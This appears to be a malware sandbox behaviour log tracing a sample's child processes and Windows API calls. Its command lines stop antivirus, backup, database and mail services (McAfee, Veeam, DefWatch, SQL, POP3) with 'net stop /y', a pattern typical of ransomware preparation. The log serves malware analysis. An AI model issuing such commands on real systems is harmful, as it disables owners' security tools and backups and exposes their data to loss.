cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 530 os_tid = 0x1040 Process: id = "156" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1bdb4000" os_pid = "0x1044" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSOLAP$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 531 os_tid = 0x1048 Process: id = "157" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x246b9000" os_pid = "0x104c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop UI0Detect /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 532 os_tid = 0x1050 Process: id = "158" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x258c3000" os_pid = "0x10a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop McAfeeFrameworkMcAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 533 os_tid = 0x10a8 Process: id = "159" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x246c8000" os_pid = "0x10ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop CAARCUpdateSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 534 os_tid = 0x10b0 Process: id = "160" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x215cd000" os_pid = "0x10b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop VeeamCatalogSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 535 os_tid = 0x10b8 Process: id = "161" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x224d1000" os_pid = "0x10fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop POP3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 537 os_tid = 0x1100 Process: id = "162" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1b3f6000" os_pid = "0x1108" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x8b4" cmd_line = "C:\\Windows\\system32\\net1 stop DefWatch /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 538 os_tid = 0x110c [0110.027] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff7c | out: lpSystemTimeAsFileTime=0x28ff7c*(dwLowDateTime=0x15d0f070, dwHighDateTime=0x1d6f0d1)) [0110.028] GetCurrentProcessId () returned 0x1108 [0110.028] GetCurrentThreadId () returned 0x110c [0110.028] GetTickCount () returned 0x114f0b6 [0110.028] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff74 | out: lpPerformanceCount=0x28ff74*=22912853708) returned 1 [0110.028] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0110.028] __set_app_type (_Type=0x1) [0110.028] __p__fmode () returned 0x770331f4 [0110.028] __p__commode () returned 0x770331fc [0110.028] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0110.029] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0110.029] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.029] GetConsoleOutputCP () returned 0x1b5 [0110.029] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0110.029] SetThreadUILanguage (LangId=0x0) returned 0x409 [0110.033] sprintf_s (in: _DstBuf=0x28ff34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0110.033] setlocale (category=0, locale=".437") returned="English_United States.437" [0110.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0110.035] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0110.035] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DefWatch /y" [0110.035] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fd00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0110.035] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x64) returned 0x2a3ad8 [0110.035] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0110.036] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28ff04 | out: Buffer=0x28ff04*=0x2a1ae0) returned 0x0 [0110.036] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28ff04 | out: Buffer=0x28ff04*=0x2a1af8) returned 0x0 [0110.036] _fileno (_File=0x77032900) returned -2 [0110.036] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0110.036] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0110.036] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0110.036] _wcsicmp (_String1="config", _String2="stop") returned -16 [0110.036] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0110.036] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0110.036] _wcsicmp (_String1="file", _String2="stop") returned -13 [0110.036] _wcsicmp (_String1="files", _String2="stop") returned -13 [0110.036] _wcsicmp (_String1="group", _String2="stop") returned -12 [0110.036] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0110.036] _wcsicmp (_String1="help", _String2="stop") returned -11 [0110.036] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0110.036] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0110.036] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0110.036] _wcsicmp (_String1="session", _String2="stop") returned -15 [0110.037] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0110.037] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0110.037] _wcsicmp (_String1="share", _String2="stop") returned -12 [0110.037] _wcsicmp (_String1="start", _String2="stop") returned -14 [0110.037] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0110.037] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0110.037] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0110.037] _wcsicmp (_String1="accounts", _String2="DefWatch") returned -3 [0110.037] _wcsicmp (_String1="computer", _String2="DefWatch") returned -1 [0110.037] _wcsicmp (_String1="config", _String2="DefWatch") returned -1 [0110.037] _wcsicmp (_String1="continue", _String2="DefWatch") returned -1 [0110.037] _wcsicmp (_String1="cont", _String2="DefWatch") returned -1 [0110.037] _wcsicmp (_String1="file", _String2="DefWatch") returned 2 [0110.037] _wcsicmp (_String1="files", _String2="DefWatch") returned 2 [0110.037] _wcsicmp (_String1="group", _String2="DefWatch") returned 3 [0110.037] _wcsicmp (_String1="groups", _String2="DefWatch") returned 3 [0110.037] _wcsicmp (_String1="help", _String2="DefWatch") returned 4 [0110.037] _wcsicmp (_String1="helpmsg", _String2="DefWatch") returned 4 [0110.037] _wcsicmp (_String1="localgroup", _String2="DefWatch") returned 8 [0110.037] _wcsicmp (_String1="pause", _String2="DefWatch") returned 12 [0110.037] _wcsicmp (_String1="session", _String2="DefWatch") returned 15 [0110.037] _wcsicmp (_String1="sessions", _String2="DefWatch") returned 15 [0110.037] _wcsicmp (_String1="sess", _String2="DefWatch") returned 15 [0110.038] _wcsicmp (_String1="share", _String2="DefWatch") returned 15 [0110.038] _wcsicmp (_String1="start", _String2="DefWatch") returned 15 [0110.038] _wcsicmp (_String1="stats", _String2="DefWatch") returned 15 [0110.038] _wcsicmp (_String1="statistics", _String2="DefWatch") returned 15 [0110.038] _wcsicmp (_String1="stop", _String2="DefWatch") returned 15 [0110.038] _wcsicmp (_String1="time", _String2="DefWatch") returned 16 [0110.038] _wcsicmp (_String1="user", _String2="DefWatch") returned 17 [0110.038] _wcsicmp (_String1="users", _String2="DefWatch") returned 17 [0110.038] _wcsicmp (_String1="msg", _String2="DefWatch") returned 9 [0110.038] _wcsicmp (_String1="messenger", _String2="DefWatch") returned 9 [0110.038] _wcsicmp (_String1="receiver", _String2="DefWatch") returned 14 [0110.038] _wcsicmp (_String1="rcv", _String2="DefWatch") returned 14 [0110.038] _wcsicmp (_String1="netpopup", _String2="DefWatch") returned 10 [0110.038] _wcsicmp (_String1="redirector", _String2="DefWatch") returned 14 [0110.038] _wcsicmp (_String1="redir", _String2="DefWatch") returned 14 [0110.038] _wcsicmp (_String1="rdr", _String2="DefWatch") returned 14 [0110.038] _wcsicmp (_String1="workstation", _String2="DefWatch") returned 19 [0110.038] _wcsicmp (_String1="work", _String2="DefWatch") returned 19 [0110.038] _wcsicmp (_String1="wksta", _String2="DefWatch") returned 19 [0110.038] _wcsicmp (_String1="prdr", _String2="DefWatch") returned 12 [0110.038] _wcsicmp (_String1="devrdr", _String2="DefWatch") returned 16 [0110.038] _wcsicmp (_String1="lanmanworkstation", _String2="DefWatch") returned 8 [0110.038] _wcsicmp (_String1="server", _String2="DefWatch") returned 15 [0110.039] _wcsicmp (_String1="svr", _String2="DefWatch") returned 15 [0110.039] _wcsicmp (_String1="srv", _String2="DefWatch") returned 15 [0110.039] _wcsicmp (_String1="lanmanserver", _String2="DefWatch") returned 8 [0110.039] _wcsicmp (_String1="alerter", _String2="DefWatch") returned -3 [0110.039] _wcsicmp (_String1="netlogon", _String2="DefWatch") returned 10 [0110.039] _wcsupr (in: _String="DefWatch" | out: _String="DEFWATCH") returned="DEFWATCH" [0110.039] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2a54a8 [0110.103] GetServiceKeyNameW (in: hSCManager=0x2a54a8, lpDisplayName="DEFWATCH", lpServiceName=0x3faaf0, lpcchBuffer=0x28fea0 | out: lpServiceName="", lpcchBuffer=0x28fea0) returned 0 [0110.103] _wcsicmp (_String1="msg", _String2="DEFWATCH") returned 9 [0110.103] _wcsicmp (_String1="messenger", _String2="DEFWATCH") returned 9 [0110.103] _wcsicmp (_String1="receiver", _String2="DEFWATCH") returned 14 [0110.103] _wcsicmp (_String1="rcv", _String2="DEFWATCH") returned 14 [0110.103] _wcsicmp (_String1="redirector", _String2="DEFWATCH") returned 14 [0110.103] _wcsicmp (_String1="redir", _String2="DEFWATCH") returned 14 [0110.103] _wcsicmp (_String1="rdr", _String2="DEFWATCH") returned 14 [0110.103] _wcsicmp (_String1="workstation", _String2="DEFWATCH") returned 19 [0110.103] _wcsicmp (_String1="work", _String2="DEFWATCH") returned 19 [0110.103] _wcsicmp (_String1="wksta", _String2="DEFWATCH") returned 19 [0110.103] _wcsicmp (_String1="prdr", _String2="DEFWATCH") returned 12 [0110.103] _wcsicmp (_String1="devrdr", _String2="DEFWATCH") returned 16 [0110.104] _wcsicmp (_String1="lanmanworkstation", _String2="DEFWATCH") returned 8 [0110.104] _wcsicmp (_String1="server", _String2="DEFWATCH") returned 15 [0110.104] _wcsicmp (_String1="svr", _String2="DEFWATCH") returned 15 [0110.104] _wcsicmp (_String1="srv", _String2="DEFWATCH") returned 15 [0110.104] _wcsicmp (_String1="lanmanserver", _String2="DEFWATCH") returned 8 [0110.104] _wcsicmp (_String1="alerter", _String2="DEFWATCH") returned -3 [0110.104] _wcsicmp (_String1="netlogon", _String2="DEFWATCH") returned 10 [0110.104] NetServiceControl (in: servername=0x0, service="DEFWATCH", opcode=0x0, arg=0x0, bufptr=0x28fe9c | out: bufptr=0x28fe9c) returned 0x889 [0110.105] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0110.105] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0110.105] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0110.106] GetFileType (hFile=0x0) returned 0x0 [0110.106] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2a3ec0 [0110.106] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2a3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0110.106] WriteFile (in: hFile=0x0, lpBuffer=0x2a3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x28fddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fddc, lpOverlapped=0x0) returned 0 [0110.106] LocalFree (hMem=0x2a3ec0) returned 0x0 [0110.106] GetFileType (hFile=0x0) returned 0x0 [0110.106] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a6170 [0110.106] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2a6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n*", lpUsedDefaultChar=0x0) returned 2 [0110.107] WriteFile (in: hFile=0x0, lpBuffer=0x2a6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28fddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fddc, lpOverlapped=0x0) returned 0 [0110.107] LocalFree (hMem=0x2a6170) returned 0x0 [0110.107] _ultow (in: _Dest=0x889, _Radix=2686476 | out: _Dest=0x889) returned="2185" [0110.107] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0110.107] GetFileType (hFile=0x0) returned 0x0 [0110.107] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2a6170 [0110.107] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2a6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0110.107] WriteFile (in: hFile=0x0, lpBuffer=0x2a6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x28fde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fde8, lpOverlapped=0x0) returned 0 [0110.107] LocalFree (hMem=0x2a6170) returned 0x0 [0110.107] GetFileType (hFile=0x0) returned 0x0 [0110.107] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a6170 [0110.107] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2a6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n*", lpUsedDefaultChar=0x0) returned 2 [0110.107] WriteFile (in: hFile=0x0, lpBuffer=0x2a6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28fde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fde8, lpOverlapped=0x0) returned 0 [0110.107] LocalFree (hMem=0x2a6170) returned 0x0 [0110.107] NetApiBufferFree (Buffer=0x2a1ae0) returned 0x0 [0110.108] NetApiBufferFree (Buffer=0x2a1af8) returned 0x0 [0110.108] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DefWatch /y" [0110.108] exit (_Code=2) Process: id = "163" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2084a000" os_pid = "0x1118" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x844" cmd_line = "C:\\Windows\\system32\\net1 stop QBIDPService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 540 os_tid = 0x111c [0110.075] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f854 | out: lpSystemTimeAsFileTime=0x30f854*(dwLowDateTime=0x15d81490, dwHighDateTime=0x1d6f0d1)) [0110.075] GetCurrentProcessId () returned 0x1118 [0110.075] GetCurrentThreadId () returned 0x111c [0110.075] GetTickCount () returned 0x114f0e4 [0110.075] QueryPerformanceCounter (in: lpPerformanceCount=0x30f84c | out: lpPerformanceCount=0x30f84c*=22917574046) returned 1 [0110.075] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0110.075] __set_app_type (_Type=0x1) [0110.075] __p__fmode () returned 0x770331f4 [0110.075] __p__commode () returned 0x770331fc [0110.076] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0110.076] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0110.076] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0110.076] GetConsoleOutputCP () returned 0x1b5 [0110.076] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0110.076] SetThreadUILanguage (LangId=0x0) returned 0x409 [0110.080] sprintf_s (in: _DstBuf=0x30f80c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0110.080] setlocale (category=0, locale=".437") returned="English_United States.437" [0110.082] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0110.082] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0110.082] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop QBIDPService /y" [0110.082] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f5d8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0110.082] RtlAllocateHeap (HeapHandle=0x7f0000, Flags=0x0, Size=0x6c) returned 0x803ae0 [0110.082] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0110.083] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f7dc | out: Buffer=0x30f7dc*=0x801ae8) returned 0x0 [0110.083] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f7dc | out: Buffer=0x30f7dc*=0x801b00) returned 0x0 [0110.083] _fileno (_File=0x77032900) returned -2 [0110.083] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0110.083] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0110.083] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0110.083] _wcsicmp (_String1="config", _String2="stop") returned -16 [0110.083] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0110.083] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0110.083] _wcsicmp (_String1="file", _String2="stop") returned -13 [0110.083] _wcsicmp (_String1="files", _String2="stop") returned -13 [0110.083] _wcsicmp (_String1="group", _String2="stop") returned -12 [0110.083] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0110.083] _wcsicmp (_String1="help", _String2="stop") returned -11 [0110.083] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0110.083] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0110.083] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0110.083] _wcsicmp (_String1="session", _String2="stop") returned -15 [0110.083] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0110.083] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0110.083] _wcsicmp (_String1="share", _String2="stop") returned -12 [0110.084] _wcsicmp (_String1="start", _String2="stop") returned -14 [0110.084] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0110.084] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0110.084] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0110.084] _wcsicmp (_String1="accounts", _String2="QBIDPService") returned -16 [0110.084] _wcsicmp (_String1="computer", _String2="QBIDPService") returned -14 [0110.084] _wcsicmp (_String1="config", _String2="QBIDPService") returned -14 [0110.084] _wcsicmp (_String1="continue", _String2="QBIDPService") returned -14 [0110.084] _wcsicmp (_String1="cont", _String2="QBIDPService") returned -14 [0110.084] _wcsicmp (_String1="file", _String2="QBIDPService") returned -11 [0110.084] _wcsicmp (_String1="files", _String2="QBIDPService") returned -11 [0110.084] _wcsicmp (_String1="group", _String2="QBIDPService") returned -10 [0110.084] _wcsicmp (_String1="groups", _String2="QBIDPService") returned -10 [0110.084] _wcsicmp (_String1="help", _String2="QBIDPService") returned -9 [0110.084] _wcsicmp (_String1="helpmsg", _String2="QBIDPService") returned -9 [0110.084] _wcsicmp (_String1="localgroup", _String2="QBIDPService") returned -5 [0110.084] _wcsicmp (_String1="pause", _String2="QBIDPService") returned -1 [0110.084] _wcsicmp (_String1="session", _String2="QBIDPService") returned 2 [0110.084] _wcsicmp (_String1="sessions", _String2="QBIDPService") returned 2 [0110.084] _wcsicmp (_String1="sess", _String2="QBIDPService") returned 2 [0110.084] _wcsicmp (_String1="share", _String2="QBIDPService") returned 2 [0110.084] _wcsicmp (_String1="start", _String2="QBIDPService") returned 2 [0110.084] _wcsicmp (_String1="stats", _String2="QBIDPService") returned 2 [0110.084] _wcsicmp (_String1="statistics", _String2="QBIDPService") returned 2 [0110.084] _wcsicmp (_String1="stop", _String2="QBIDPService") returned 2 [0110.085] _wcsicmp (_String1="time", _String2="QBIDPService") returned 3 [0110.085] _wcsicmp (_String1="user", _String2="QBIDPService") returned 4 [0110.085] _wcsicmp (_String1="users", _String2="QBIDPService") returned 4 [0110.085] _wcsicmp (_String1="msg", _String2="QBIDPService") returned -4 [0110.085] _wcsicmp (_String1="messenger", _String2="QBIDPService") returned -4 [0110.085] _wcsicmp (_String1="receiver", _String2="QBIDPService") returned 1 [0110.085] _wcsicmp (_String1="rcv", _String2="QBIDPService") returned 1 [0110.085] _wcsicmp (_String1="netpopup", _String2="QBIDPService") returned -3 [0110.085] _wcsicmp (_String1="redirector", _String2="QBIDPService") returned 1 [0110.085] _wcsicmp (_String1="redir", _String2="QBIDPService") returned 1 [0110.085] _wcsicmp (_String1="rdr", _String2="QBIDPService") returned 1 [0110.085] _wcsicmp (_String1="workstation", _String2="QBIDPService") returned 6 [0110.085] _wcsicmp (_String1="work", _String2="QBIDPService") returned 6 [0110.085] _wcsicmp (_String1="wksta", _String2="QBIDPService") returned 6 [0110.085] _wcsicmp (_String1="prdr", _String2="QBIDPService") returned -1 [0110.085] _wcsicmp (_String1="devrdr", _String2="QBIDPService") returned -13 [0110.085] _wcsicmp (_String1="lanmanworkstation", _String2="QBIDPService") returned -5 [0110.085] _wcsicmp (_String1="server", _String2="QBIDPService") returned 2 [0110.085] _wcsicmp (_String1="svr", _String2="QBIDPService") returned 2 [0110.085] _wcsicmp (_String1="srv", _String2="QBIDPService") returned 2 [0110.085] _wcsicmp (_String1="lanmanserver", _String2="QBIDPService") returned -5 [0110.085] _wcsicmp (_String1="alerter", _String2="QBIDPService") returned -16 [0110.085] _wcsicmp (_String1="netlogon", _String2="QBIDPService") returned -3 